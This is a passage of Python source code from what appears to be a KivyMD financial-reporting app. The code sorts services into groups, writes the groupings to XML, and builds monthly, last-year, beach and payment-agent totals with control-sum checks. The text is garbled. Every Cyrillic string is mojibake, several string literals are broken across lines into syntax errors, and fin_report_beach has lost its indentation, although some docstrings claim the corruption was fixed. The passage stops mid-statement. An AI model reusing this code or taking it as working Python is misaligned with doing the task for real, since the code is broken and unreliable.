    sheet.add_item(f'ะะพะฑะฐะฒะธัั ะฝะพะฒัั ะณััะฟะฟั ะพััะตัะฐ...',
                   lambda x: self.show_dialog_add_org("ะะพะฒะฐั ะณััะฟะฟะฐ", "ะะฐะทะฒะฐะฝะธะต ะฝะพะฒะพะน ะณััะฟะฟั", service))
    sheet.open()
def show_dialog_add_org(self, title, text, service):
    """Show a dialog prompting for a new report-group name (Cancel / Add)."""
    field = MDTextField(hint_text="Persistent helper text222",
                        helper_text="Text is always here111",
                        helper_text_mode="persistent",
                        text=text)
    dialog = MDDialog(title=title,
                      content=field,
                      size_hint=(.8, None),
                      height=dp(200),
                      auto_dismiss=False)
    # Cancel: put the service back into the unassigned queue
    dialog.add_action_button(
        "ะัะผะตะฝะฐ", action=lambda *x: (dialog.dismiss(), self.readd_org(service)))
    # Add: create the group with whatever name the user typed
    dialog.add_action_button(
        "ะะพะฑะฐะฒะธัั",
        action=lambda *x: (dialog.dismiss(), self.create_new_org(dialog.content.text, service)))
    dialog.open()
def create_new_org(self, name, service):
    """Create report group *name*, requeue *service*, and persist to XML.

    Adds the group to ``self.orgs`` / ``self.orgs_dict``, puts the
    service back into the unassigned queue (so it can be assigned to
    the new group), then appends a ``UrFace`` node with the mandatory
    placeholder service to the report XML file.
    """
    logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะพะฑะฐะฒะปะตะฝะธะต ะฝะพะฒะพะน ะณััะฟะฟั - {name}')
    logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะพะฑะฐะฒะปะตะฝะธะต ััะปัะณะธ {service} ะฒ ะณััะฟะฟั {name}')
    self.orgs.append(name)
    self.orgs_dict[name] = []
    self.readd_org(service)
    with open(self.reportXML, encoding='utf-8') as f:
        root = objectify.fromstring(f.read())
    # append the new group with its mandatory placeholder service
    new_org = objectify.SubElement(root, "UrFace")
    new_org.set('Name', name)
    new_servs = objectify.SubElement(new_org, 'Services')
    new_serv = objectify.SubElement(new_servs, 'Service')
    new_serv.set('Name', 'ะัััะฐั ะพะฑัะทะฐัะตะปัะฝะฐั ะบะฐัะตะณะพัะธั')
    # strip lxml.objectify annotations before serialising
    objectify.deannotate(root)
    etree.cleanup_namespaces(root)
    payload = etree.tostring(root,
                             encoding='utf-8',
                             pretty_print=True,
                             xml_declaration=True
                             )
    # best-effort write: failures are deliberately ignored
    try:
        with open(self.reportXML, "w", encoding='utf_8_sig') as xml_writer:
            xml_writer.write(payload.decode('utf-8'))
    except IOError:
        pass
def readd_org(self, service):
    """Requeue *service* as unassigned and resume the distribution loop."""
    self.new_service.append(service)
    self.distibution_service()
def select_org(self, service, org):
    """Assign *service* to group *org*, persist the mapping, continue.

    Appends the service to the in-memory mapping, writes it under the
    matching ``UrFace`` node in the report XML, then resumes the
    distribution loop for the remaining services.
    """
    logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะพะฑะฐะฒะปะตะฝะธะต ััะปัะณะธ {service} ะฒ ะณััะฟะฟั {org}')
    self.orgs_dict[org].append(service)
    # persist the new service under its group in the report XML
    with open(self.reportXML, encoding='utf-8') as f:
        root = objectify.fromstring(f.read())
    for node in root.UrFace:
        if node.get('Name') == org:
            entry = objectify.SubElement(node.Services, "Service")
            entry.set("Name", service)
    # strip lxml.objectify annotations before serialising
    objectify.deannotate(root)
    etree.cleanup_namespaces(root)
    payload = etree.tostring(root, encoding='utf-8', pretty_print=True, xml_declaration=True)
    # best-effort write: failures are deliberately ignored
    try:
        with open(self.reportXML, "w", encoding='utf_8_sig') as xml_writer:
            xml_writer.write(payload.decode('utf-8'))
    except IOError:
        pass
    self.distibution_service()
def agentservice(self):
    """Check all agent totals reports for services missing from the agent XML."""
    self.agent_dict = self.read_reportgroup(self.agentXML)
    reports = [
        self.itog_report_org1,
        self.itog_report_org1_lastyear,
        self.itog_report_org3,
        self.itog_report_org3_lastyear,
    ]
    if self.itog_report_month:
        reports.append(self.itog_report_month)
    for report in reports:
        self.find_new_agentservice(report, self.agent_dict)
    self.distibution_agentservice()
def distibution_agentservice(self):
    """Process the next unassigned agent service, or save reports when done."""
    if not self.new_agentservice:
        self.save_reports()
        return
    self.viev_agentorgs(self.new_agentservice.pop())
def find_new_agentservice(self, service_dict, orgs_dict):
    """Queue agent services missing from the agent XML mapping.

    Mirrors ``find_new_service`` but feeds ``self.new_agentservice``
    and ``self.agentorgs``.
    """
    known = {s for services in orgs_dict.values() for s in services}
    for serv in service_dict:
        if serv not in known and serv not in self.new_agentservice:
            self.new_agentservice.append(serv)
            known.add(serv)
    for org in orgs_dict:
        if org not in self.agentorgs:
            self.agentorgs.append(org)
def viev_agentorgs(self, service):
    """Show a bottom sheet asking which organisation agent *service* belongs to."""
    sheet = MDListBottomSheet()
    sheet.add_item(
        f'ะ ะบะฐะบะพะน ะพัะณะฐะฝะธะทะฐัะธะธ ะพัะฝะพัะธััั ััะปัะณะฐ "{service}"? (1 ะธะท {len(self.new_agentservice) + 1})',
        lambda x: x)
    for org in self.agentorgs:
        # pseudo-entries are not valid assignment targets
        if org not in ('ะะขะะะ', 'ะะตะฟะพะทะธั', 'ะะฐัะฐ'):
            sheet.add_item(org, lambda x: self.select_agentorg(service, x.text), icon='nfc')
    sheet.add_item(f'ะะพะฑะฐะฒะธัั ะฝะพะฒัั ะพัะณะฐะฝะธะทะฐัะธั...',
                   lambda x: self.show_dialog_add_agentorg('ะะฐะธะผะตะฝะพะฒะฐะฝะธะต ะพัะณะฐะฝะธะทะฐัะธะธ', 'ะะะ ะ ะพะณะฐ ะธ ะะพะฟััะฐ', service))
    sheet.open()
def select_agentorg(self, service, org):
    """Assign agent *service* to organisation *org*, persist, continue.

    Appends the service to the in-memory agent mapping, writes it under
    the matching ``UrFace`` node in the agent XML, then resumes the
    agent distribution loop.

    Consistency fix: logs the assignment the same way its twin
    ``select_org`` does.
    """
    logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะพะฑะฐะฒะปะตะฝะธะต ััะปัะณะธ {service} ะฒ ะณััะฟะฟั {org}')
    self.agent_dict[org].append(service)
    # persist the new service under its organisation in the agent XML
    with open(self.agentXML, encoding='utf-8') as f:
        root = objectify.fromstring(f.read())
    for node in root.UrFace:
        if node.get('Name') == org:
            entry = objectify.SubElement(node.Services, "Service")
            entry.set("Name", service)
    # strip lxml.objectify annotations before serialising
    objectify.deannotate(root)
    etree.cleanup_namespaces(root)
    payload = etree.tostring(root, encoding='utf-8', pretty_print=True, xml_declaration=True)
    # best-effort write: failures are deliberately ignored
    try:
        with open(self.agentXML, "w", encoding='utf_8_sig') as xml_writer:
            xml_writer.write(payload.decode('utf-8'))
    except IOError:
        pass
    self.distibution_agentservice()
def show_dialog_add_agentorg(self, title, text, service):
    """Show a dialog prompting for a new agent organisation name (Cancel / Add)."""
    field = MDTextField(hint_text="Persistent helper text222",
                        helper_text="Text is always here111",
                        helper_text_mode="persistent",
                        text=text)
    dialog = MDDialog(title=title,
                      content=field,
                      size_hint=(.8, None),
                      height=dp(200),
                      auto_dismiss=False)
    # Cancel: put the service back into the unassigned queue
    dialog.add_action_button(
        "ะัะผะตะฝะฐ", action=lambda *x: (dialog.dismiss(), self.readd_agentorg(service)))
    # Add: create the organisation with whatever name the user typed
    dialog.add_action_button(
        "ะะพะฑะฐะฒะธัั",
        action=lambda *x: (dialog.dismiss(), self.create_new_agentorg(dialog.content.text, service)))
    dialog.open()
def create_new_agentorg(self, name, service):
    """Create agent organisation *name*, requeue *service*, persist to XML.

    Adds the organisation to ``self.agentorgs`` / ``self.agent_dict``,
    puts the service back into the unassigned queue, then appends a
    ``UrFace`` node with the mandatory placeholder service to the agent
    XML file.

    Consistency fix: logs the creation and assignment the same way its
    twin ``create_new_org`` does.
    """
    logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะพะฑะฐะฒะปะตะฝะธะต ะฝะพะฒะพะน ะณััะฟะฟั - {name}')
    logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะพะฑะฐะฒะปะตะฝะธะต ััะปัะณะธ {service} ะฒ ะณััะฟะฟั {name}')
    self.agentorgs.append(name)
    self.agent_dict[name] = []
    self.readd_agentorg(service)
    with open(self.agentXML, encoding='utf-8') as f:
        root = objectify.fromstring(f.read())
    # append the new organisation with its mandatory placeholder service
    new_org = objectify.SubElement(root, "UrFace")
    new_org.set('Name', name)
    new_servs = objectify.SubElement(new_org, 'Services')
    new_serv = objectify.SubElement(new_servs, 'Service')
    new_serv.set('Name', 'ะัััะฐั ะพะฑัะทะฐัะตะปัะฝะฐั ะบะฐัะตะณะพัะธั')
    # strip lxml.objectify annotations before serialising
    objectify.deannotate(root)
    etree.cleanup_namespaces(root)
    payload = etree.tostring(root,
                             encoding='utf-8',
                             pretty_print=True,
                             xml_declaration=True
                             )
    # best-effort write: failures are deliberately ignored
    try:
        with open(self.agentXML, "w", encoding='utf_8_sig') as xml_writer:
            xml_writer.write(payload.decode('utf-8'))
    except IOError:
        pass
def readd_agentorg(self, service):
    """Requeue agent *service* as unassigned and resume the distribution loop."""
    self.new_agentservice.append(service)
    self.distibution_agentservice()
def fin_report(self):
    """Build the financial report dict from the totals reports.

    Populates ``self.finreport_dict`` as ``{group: [count, sum]}`` by
    folding the per-service totals of org1 and org3 into the groups of
    ``self.orgs_dict``, plus special entries 'ะะพะป-ะฒะพ ะฟัะพั…ะพะดะพะฒ'
    (aquazone entry count), 'Online ะัะพะดะฐะถะธ' (Bitrix) and 'ะกะผะฐะนะป'
    (R-Keeper).

    Fix: restores the dict key 'ะะพะป-ะฒะพ ะฟัะพั…ะพะดะพะฒ' that was corrupted
    (the letter "ั…" had turned into a line break); the separate
    KeyError/TypeError pass-clauses are merged.
    """
    logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะคะพัะผะธัะพะฒะฐะฝะธะต ัะธะฝะฐะฝัะพะฒะพะณะพ ะพััะตัะฐ')
    self.finreport_dict = {}
    is_aquazona = None
    for org, services in self.orgs_dict.items():
        if org == 'ะะต ััะธััะฒะฐัั':
            continue
        self.finreport_dict[org] = [0, 0.00]
        for serv in services:
            try:
                if org == 'ะะฐัะฐ':
                    # the cash group mirrors a single service directly
                    self.finreport_dict[org][0] = self.itog_report_org1[serv][0]
                    self.finreport_dict[org][1] = self.itog_report_org1[serv][1]
                elif serv == 'ะะตะฟะพะทะธั':
                    self.finreport_dict[org][1] += self.itog_report_org1[serv][1]
                elif serv == 'ะะบะฒะฐะทะพะฝะฐ':
                    # aquazone count is reported as a separate entry
                    self.finreport_dict['ะะพะป-ะฒะพ ะฟัะพั…ะพะดะพะฒ'] = [self.itog_report_org1[serv][0], 0]
                    self.finreport_dict[org][1] += self.itog_report_org1[serv][1]
                    is_aquazona = True
                elif serv == 'ะัะณะฐะฝะธะทะฐัะธั':
                    # marker row, not a real service
                    pass
                else:
                    for src in (self.itog_report_org1, self.itog_report_org3):
                        if src.get(serv) and src[serv][1] != 0.0:
                            self.finreport_dict[org][0] += src[serv][0]
                            self.finreport_dict[org][1] += src[serv][1]
            except (KeyError, TypeError):
                # missing service in the report / non-numeric row: skip
                pass
    if not is_aquazona:
        self.finreport_dict['ะะพะป-ะฒะพ ะฟัะพั…ะพะดะพะฒ'] = [0, 0.00]
    self.finreport_dict.setdefault('Online ะัะพะดะฐะถะธ', [0, 0.0])
    self.finreport_dict['Online ะัะพะดะฐะถะธ'][0] += self.report_bitrix[0]
    self.finreport_dict['Online ะัะพะดะฐะถะธ'][1] += self.report_bitrix[1]
    self.finreport_dict['ะกะผะฐะนะป'][0] = len(self.report_rk)
    self.finreport_dict['ะกะผะฐะนะป'][1] = float(sum(line['paid_sum'] for line in self.report_rk))
def fin_report_lastyear(self):
    """
    Build the financial report for the same period of the previous year.

    Mirrors :meth:`fin_report` but reads the ``*_lastyear`` source dicts
    (``itog_report_org1_lastyear``, ``itog_report_org3_lastyear``,
    ``report_bitrix_lastyear``, ``report_rk_lastyear``) into
    ``self.finreport_dict_lastyear``.
    :return - dict
    """
    logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะคะพัะผะธัะพะฒะฐะฝะธะต ัะธะฝะฐะฝัะพะฒะพะณะพ ะพััะตัะฐ ะทะฐ ะฟัะพัะปัะน ะณะพะด')
    self.finreport_dict_lastyear = {}
    is_aquazona = None
    for org, services in self.orgs_dict.items():
        if org != 'ะะต ััะธััะฒะฐัั':
            self.finreport_dict_lastyear[org] = [0, 0.00]
            for serv in services:
                try:
                    if org == 'ะะฐัะฐ':
                        # the 'ะะฐัะฐ' entry carries the report period, not totals
                        self.finreport_dict_lastyear[org][0] = self.itog_report_org1_lastyear[serv][0]
                        self.finreport_dict_lastyear[org][1] = self.itog_report_org1_lastyear[serv][1]
                    elif serv == 'ะะตะฟะพะทะธั':
                        # deposits contribute money only, no visit count
                        self.finreport_dict_lastyear[org][1] += self.itog_report_org1_lastyear[serv][1]
                    elif serv == 'ะะบะฒะฐะทะพะฝะฐ':
                        # aquazone visit count is reported separately
                        self.finreport_dict_lastyear['ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ'] = [self.itog_report_org1_lastyear[serv][0], 0]
                        self.finreport_dict_lastyear[org][1] += self.itog_report_org1_lastyear[serv][1]
                        is_aquazona = True
                    elif serv == 'ะัะณะฐะฝะธะทะฐัะธั':
                        pass
                    else:
                        # regular service: fold in non-zero rows from both sources
                        if self.itog_report_org1_lastyear.get(serv) \
                                and self.itog_report_org1_lastyear[serv][1] != 0.0:
                            self.finreport_dict_lastyear[org][0] += self.itog_report_org1_lastyear[serv][0]
                            self.finreport_dict_lastyear[org][1] += self.itog_report_org1_lastyear[serv][1]
                        if self.itog_report_org3_lastyear.get(serv) \
                                and self.itog_report_org3_lastyear[serv][1] != 0.0:
                            self.finreport_dict_lastyear[org][0] += self.itog_report_org3_lastyear[serv][0]
                            self.finreport_dict_lastyear[org][1] += self.itog_report_org3_lastyear[serv][1]
                except KeyError:
                    # service missing from the source report — skip it
                    pass
                except TypeError:
                    # non-numeric row (e.g. dates) — skip it
                    pass
    if not is_aquazona:
        self.finreport_dict_lastyear['ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ'] = [0, 0.00]
    self.finreport_dict_lastyear.setdefault('Online ะัะพะดะฐะถะธ', [0, 0.0])
    self.finreport_dict_lastyear['Online ะัะพะดะฐะถะธ'][0] += self.report_bitrix_lastyear[0]
    self.finreport_dict_lastyear['Online ะัะพะดะฐะถะธ'][1] += self.report_bitrix_lastyear[1]
    # 'ะกะผะฐะนะป' totals always come from the RK report (key must already exist)
    self.finreport_dict_lastyear['ะกะผะฐะนะป'][0] = len(self.report_rk_lastyear)
    self.finreport_dict_lastyear['ะกะผะฐะนะป'][1] = float(sum([line['paid_sum'] for line in self.report_rk_lastyear]))
def fin_report_month(self):
    """
    Build the monthly financial report into ``self.finreport_dict_month``.

    Structure: {group_name: {folder_name: [[header, count, sum], [item, ...], ...]}}.
    A running 'ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ' is accumulated alongside and compared
    against the 'ะะขะะะ' totals at the end; a dialog is shown on mismatch.
    :return - dict
    """
    logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะคะพัะผะธัะพะฒะฐะฝะธะต ัะธะฝะฐะฝัะพะฒะพะณะพ ะพััะตัะฐ ะทะฐ ะผะตััั')
    self.finreport_dict_month = {}
    # NOTE(review): the folder key 'Cัะผะผะฐ' starts with a Latin 'C' while the
    # row label 'ะกัะผะผะฐ' is Cyrillic — kept as-is, other code relies on it.
    control_sum_group = self.finreport_dict_month.setdefault('ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ', {})
    control_sum = control_sum_group.setdefault('Cัะผะผะฐ', [['ะกัะผะผะฐ', 0, 0.0]])
    # 'ะกะผะฐะนะป' (RK) totals, injected manually into the 'ะะฑัะตะฟะธั' group below
    smile = [len(self.report_rk_month), float(sum([line['paid_sum'] for line in self.report_rk_month]))]
    for group_name, groups in self.itogreport_group_dict.items():
        finreport_group = self.finreport_dict_month.setdefault(group_name, {})
        finreport_group_total = finreport_group.setdefault('ะัะพะณะพ ะฟะพ ะณััะฟะฟะต', [['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต', 0, 0.0]])
        for oldgroup in groups:
            try:
                for product_name in self.orgs_dict[oldgroup]:
                    try:
                        product = self.itog_report_month[product_name]
                        if product_name == 'ะะฐัะฐ':
                            # period row — appended verbatim, not totalled
                            product_group = finreport_group.setdefault(oldgroup, [])
                            product_group.append([product_name, product[0], product[1]])
                        elif product_name == 'ะะตะฟะพะทะธั':
                            # deposits contribute money only, no count
                            product_group = finreport_group.setdefault(oldgroup, [])
                            product_group.append([product_name, 0, product[1]])
                            finreport_group_total[0][2] += product[1]
                            control_sum[0][2] += product[1]
                        elif product_name == 'ะัะณะฐะฝะธะทะฐัะธั':
                            pass
                        else:
                            # product[2] is the folder name inside the group
                            product_group = finreport_group.setdefault(product[2], [['ะัะพะณะพ ะฟะพ ะฟะฐะฟะบะต', 0, 0.0]])
                            product_group.append([product_name, product[0], product[1]])
                            product_group[0][1] += product[0]
                            product_group[0][2] += product[1]
                            finreport_group_total[0][1] += product[0]
                            finreport_group_total[0][2] += product[1]
                            if product_name != 'ะัะพะณะพ ะฟะพ ะพััะตัั':
                                control_sum[0][1] += product[0]
                                control_sum[0][2] += product[1]
                    except KeyError:
                        continue
                    except TypeError:
                        continue
            except KeyError as e:
                # orgs_dict has no such group — configuration mismatch
                self.show_dialog('ะะตัะพะพัะฒะตัััะฒะธะต ะบะพะฝัะธะณััะฐัะธะน XML-ัะฐะนะปะพะฒ', f'ะััะฟะฟะฐ {oldgroup} ะฝะต ัััะตััะฒัะตั!\n'
                                 f'KeyError: {e}')
                logging.error(f'{__name__}: {str(datetime.now())[:-7]}: ะะตัะพะพัะฒะตัััะฒะธะต ะบะพะฝัะธะณััะฐัะธะน XML-ัะฐะนะปะพะฒ\n'
                              f'ะััะฟะฟะฐ {oldgroup} ะฝะต ัััะตััะฒัะตั! \nKeyError: {e}')
            if oldgroup == 'ะะฑัะตะฟะธั':
                # inject the 'ะกะผะฐะนะป' totals into the catering folder and
                # into every 'ะะขะะะ' aggregate (group total, '' folder header
                # and its 'ะัะพะณะพ ะฟะพ ะพััะตัั' row)
                product_group = finreport_group.setdefault(
                    'ะะฑัะตะฟะธั ------------------------------------------------------------------------------ ะะ ะกะฐะปะฐั
ะพะฒะฐ',
                    [['ะัะพะณะพ ะฟะพ ะฟะฐะฟะบะต', 0, 0.0]]
                )
                product_group.append(['ะกะผะฐะนะป', smile[0], smile[1]])
                product_group[0][1] += smile[0]
                product_group[0][2] += smile[1]
                finreport_group_total[0][1] += smile[0]
                finreport_group_total[0][2] += smile[1]
                control_sum[0][1] += smile[0]
                control_sum[0][2] += smile[1]
                self.finreport_dict_month['ะะขะะะ']['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต'][0][1] += smile[0]
                self.finreport_dict_month['ะะขะะะ']['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต'][0][2] += smile[1]
                self.finreport_dict_month['ะะขะะะ'][''][0][1] += smile[0]
                self.finreport_dict_month['ะะขะะะ'][''][0][2] += smile[1]
                self.finreport_dict_month['ะะขะะะ'][''][1][1] += smile[0]
                self.finreport_dict_month['ะะขะะะ'][''][1][2] += smile[1]
    # final consistency check: report total vs accumulated control sum
    if self.finreport_dict_month['ะะขะะะ'][''][1][2] != control_sum[0][2] \
            or self.finreport_dict_month['ะะขะะะ'][''][1][1] != control_sum[0][1]:
        self.show_dialog(
            "ะะตัะพะพัะฒะตัััะฒะธะต ะะพะฝััะพะปัะฝัั
 ััะผะผ.",
            f"ะัะพะณะพ ะฟะพ ะพััะตัั ({self.finreport_dict_month['ะะขะะะ'][''][1][1]}: "
            f"{self.finreport_dict_month['ะะขะะะ'][''][1][2]}) ะฝะต ัะฐะฒะฝะพ ะะพะฝััะพะปัะฝะพะน ััะผะผะต ััะปัะณ"
            f"({control_sum[0][1]}: {control_sum[0][2]})"
        )
        logging.error(
            f"{__name__}: {str(datetime.now())[:-7]}: ะะตัะพะพัะฒะตัััะฒะธะต ะะพะฝััะพะปัะฝัั
 ััะผะผ. "
            f"ะัะพะณะพ ะฟะพ ะพััะตัั ({self.finreport_dict_month['ะะขะะะ'][''][1][1]}: "
            f"{self.finreport_dict_month['ะะขะะะ'][''][1][2]}) ะฝะต ัะฐะฒะฝะพ ะะพะฝััะพะปัะฝะพะน ััะผะผะต ััะปัะณ"
            f"({control_sum[0][1]}: {control_sum[0][2]})")
def fin_report_beach(self):
"""
ะคะพัะผะธะฝัะตั ัะธะฝะฐะฝัะพะฒัะน ะพััะตั ะฟะพ ะฟะปัะถั ะฒ ัััะฐะฝะพะฒะปะตะฝะฝะพะผ ัะพัะผะฐัะต
:return - dict
"""
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะคะพัะผะธัะพะฒะฐะฝะธะต ัะธะฝะฐะฝัะพะฒะพะณะพ ะพััะตัะฐ ะฟะพ ะฟะปัะถั')
self.finreport_dict_beach = {
'ะะตะฟะพะทะธั': (0, 0),
'ะขะพะฒะฐัั': (0, 0),
'ะฃัะปัะณะธ': (0, 0),
'ะะฐััั': (0, 0),
'ะัะพะณะพ ะฟะพ ะพััะตัั': (0, 0),
}
for service in self.itog_report_org2:
if service == 'ะะฐัะฐ':
self.finreport_dict_beach[service] = \
self.itog_report_org2[service][0], self.itog_report_org2[service][1]
elif service == 'ะัั
ะพะด ั ะฟะปัะถะฐ':
self.finreport_dict_beach[service] = \
self.itog_report_org2[service][0], self.itog_report_org2[service][1]
elif not self.itog_report_org2[service][3] in self.finreport_dict_beach:
self.finreport_dict_beach[self.itog_report_org2[service][3]] = \
self.itog_report_org2[service][0], self.itog_report_org2[service][1]
else:
try:
self.finreport_dict_beach[self.itog_report_org2[service][3]] = \
self.finreport_dict_beach[self.itog_report_org2[service][3]][0] + self.itog_report_org2[service][0], \
self.finreport_dict_beach[self.itog_report_org2[service][3]][1] + self.itog_report_org2[service][1]
except TypeError:
pass
if 'ะัั
ะพะด ั ะฟะปัะถะฐ' not in self.finreport_dict_beach:
self.finreport_dict_beach['ะัั
ะพะด ั ะฟะปัะถะฐ'] = 0, 0
def agent_report(self):
    """
    Build the payment-agent report into ``self.agentreport_dict``.

    Aggregates (count, sum) pairs from ``self.itog_report_org1`` into
    groups defined by ``self.agent_dict``; the 'ะัะณะฐะฝะธะทะฐัะธั' entry
    carries the pair from ``self.org1``.
    :return - dict
    """
    logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะคะพัะผะธัะพะฒะฐะฝะธะต ะพััะตัะฐ ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ')
    report = {'ะัะณะฐะฝะธะทะฐัะธั': [self.org1[0], self.org1[1]]}
    self.agentreport_dict = report
    source = self.itog_report_org1
    for group, service_names in self.agent_dict.items():
        if group == 'ะะต ััะธััะฒะฐัั':
            # explicitly excluded group — never appears in the report
            continue
        totals = report.setdefault(group, [0, 0])
        for name in service_names:
            try:
                if group == 'ะะฐัะฐ':
                    # the 'ะะฐัะฐ' entry carries the report period, not totals
                    totals[0] = source[name][0]
                    totals[1] = source[name][1]
                elif name in ('ะะตะฟะพะทะธั', 'ะะบะฒะฐะทะพะฝะฐ'):
                    # money only, no visit count
                    totals[1] += source[name][1]
                elif name == 'ะัะณะฐะฝะธะทะฐัะธั':
                    pass
                else:
                    totals[0] += source[name][0]
                    totals[1] += source[name][1]
            except (KeyError, TypeError):
                # service missing from the source, or non-numeric row — skip
                pass
def agent_report_month(self):
    """
    Build the monthly payment-agent report into ``self.agentreport_dict_month``.

    Structure: {org: {folder_name: [[header, count, sum], [tariff, ...], ...]}}.
    A running 'ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ' is accumulated alongside and compared
    against the 'ะะขะะะ' totals at the end; a dialog is shown on mismatch.
    :return - dict
    """
    logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะคะพัะผะธัะพะฒะฐะฝะธะต ะพััะตัะฐ ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ ะทะฐ ะผะตััั')
    self.agentreport_dict_month = {}
    self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ'] = {}
    # NOTE(review): the folder key 'Cัะผะผะฐ' starts with a Latin 'C' while the
    # row label 'ะกัะผะผะฐ' is Cyrillic — kept as-is, other code relies on it.
    self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'] = [['ะกัะผะผะฐ', 0, 0.0]]
    for org in self.agent_dict:
        self.agentreport_dict_month[org] = {}
        self.agentreport_dict_month[org]['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต'] = [
            ['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต', 0, 0.0]
        ]
        for tariff in self.agent_dict[org]:
            try:
                if tariff == 'ะะฐัะฐ':
                    # period row — appended verbatim, not totalled
                    self.agentreport_dict_month[org][tariff] = []
                    self.agentreport_dict_month[org][tariff].append(
                        [tariff, self.itog_report_month[tariff][0], self.itog_report_month[tariff][1]]
                    )
                elif tariff == 'ะะตะฟะพะทะธั':
                    # deposits contribute money only, no count
                    self.agentreport_dict_month[org][tariff] = []
                    self.agentreport_dict_month[org][tariff].append(
                        [tariff, 0, self.itog_report_month[tariff][1]]
                    )
                    self.agentreport_dict_month[org]['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต'][0][2] += self.itog_report_month[tariff][1]
                    self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][2] += self.itog_report_month[tariff][1]
                elif tariff == 'ะัะณะฐะฝะธะทะฐัะธั':
                    pass
                else:
                    # itog_report_month[tariff][2] is the folder name
                    try:
                        if self.agentreport_dict_month[org][self.itog_report_month[tariff][2]]:
                            # folder already exists and is non-empty: append and
                            # roll the tariff into folder/group/control totals
                            self.agentreport_dict_month[org][self.itog_report_month[tariff][2]]. \
                                append([tariff, self.itog_report_month[tariff][0], self.itog_report_month[tariff][1]])
                            self.agentreport_dict_month[org][self.itog_report_month[tariff][2]][0][1] += \
                                self.itog_report_month[tariff][0]
                            self.agentreport_dict_month[org][self.itog_report_month[tariff][2]][0][2] += \
                                self.itog_report_month[tariff][1]
                            self.agentreport_dict_month[org]['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต'][0][1] += \
                                self.itog_report_month[tariff][0]
                            self.agentreport_dict_month[org]['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต'][0][2] += \
                                self.itog_report_month[tariff][1]
                            if tariff != 'ะัะพะณะพ ะฟะพ ะพััะตัั':
                                self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][1] += \
                                    self.itog_report_month[tariff][0]
                                self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][2] += \
                                    self.itog_report_month[tariff][1]
                        else:
                            # folder key exists but holds an empty list —
                            # recreate it with a header row (rare path)
                            self.agentreport_dict_month[org][self.itog_report_month[tariff][2]] = []
                            self.agentreport_dict_month[org][self.itog_report_month[tariff][2]]. \
                                append(['ะัะพะณะพ ะฟะพ ะฟะฐะฟะบะต', 0, 0.0])
                            self.agentreport_dict_month[org][self.itog_report_month[tariff][2]]. \
                                append([tariff, self.itog_report_month[tariff][0], self.itog_report_month[tariff][1]])
                            self.agentreport_dict_month[org][self.itog_report_month[tariff][2]][0][1] += \
                                self.itog_report_month[tariff][0]
                            self.agentreport_dict_month[org][self.itog_report_month[tariff][2]][0][2] += \
                                self.itog_report_month[tariff][1]
                            self.agentreport_dict_month[org]['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต'][0][1] += \
                                self.itog_report_month[tariff][0]
                            self.agentreport_dict_month[org]['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต'][0][2] += \
                                self.itog_report_month[tariff][1]
                            if tariff != 'ะัะพะณะพ ะฟะพ ะพััะตัั':
                                self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][1] += \
                                    self.itog_report_month[tariff][0]
                                self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][2] += \
                                    self.itog_report_month[tariff][1]
                    except KeyError:
                        # folder seen for the first time — create it with a
                        # header row and roll the tariff into the totals
                        # NOTE(review): this path appends the tariff row as a
                        # tuple, unlike the list used elsewhere — confirm
                        # whether downstream code mutates item rows
                        self.agentreport_dict_month[org][self.itog_report_month[tariff][2]] = []
                        self.agentreport_dict_month[org][self.itog_report_month[tariff][2]]. \
                            append(['ะัะพะณะพ ะฟะพ ะฟะฐะฟะบะต', 0, 0.0])
                        self.agentreport_dict_month[org][self.itog_report_month[tariff][2]]. \
                            append((tariff, self.itog_report_month[tariff][0], self.itog_report_month[tariff][1]))
                        self.agentreport_dict_month[org][self.itog_report_month[tariff][2]][0][1] += \
                            self.itog_report_month[tariff][0]
                        self.agentreport_dict_month[org][self.itog_report_month[tariff][2]][0][2] += \
                            self.itog_report_month[tariff][1]
                        self.agentreport_dict_month[org]['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต'][0][1] += \
                            self.itog_report_month[tariff][0]
                        self.agentreport_dict_month[org]['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต'][0][2] += \
                            self.itog_report_month[tariff][1]
                        if tariff != 'ะัะพะณะพ ะฟะพ ะพััะตัั':
                            self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][1] += \
